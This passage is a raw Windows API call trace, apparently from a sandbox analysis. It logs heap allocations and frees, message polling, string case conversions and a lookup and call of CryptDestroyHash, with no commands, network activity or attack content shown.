hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0258.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0258.236] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0258.236] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0258.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0258.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.237] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0258.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0258.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0258.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.238] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.238] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0258.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0258.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0258.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0258.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0258.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa910 [0258.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa460 [0258.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7d8 [0258.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3a0 [0258.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0258.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa490 [0258.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa880 [0258.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa388 [0258.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0258.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7c0 [0258.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0258.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0258.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0258.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9b8 [0258.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa820 [0258.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0258.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa688 [0258.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa670 [0258.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa60 [0258.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0258.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0258.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0258.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0258.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0258.241] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa328 [0258.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0258.241] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0258.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0258.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0258.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0258.242] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.242] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0258.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.242] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0258.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0258.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0258.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0258.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0258.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0258.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0258.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0258.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0258.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0258.244] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0258.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0258.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0258.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0258.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0258.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0258.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0258.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0258.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0258.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0258.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0258.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0258.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0258.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466dd0 [0258.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466dd0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0258.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0258.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0258.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0258.246] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0258.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0258.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0258.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0258.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0258.246] CryptDestroyHash (hHash=0xaa5820) returned 1 [0258.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0258.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0258.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0258.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0258.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0258.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0258.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0258.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0258.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0258.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0258.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0258.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0258.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0258.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0258.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0258.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0258.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0258.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.249] HeapFree (in: 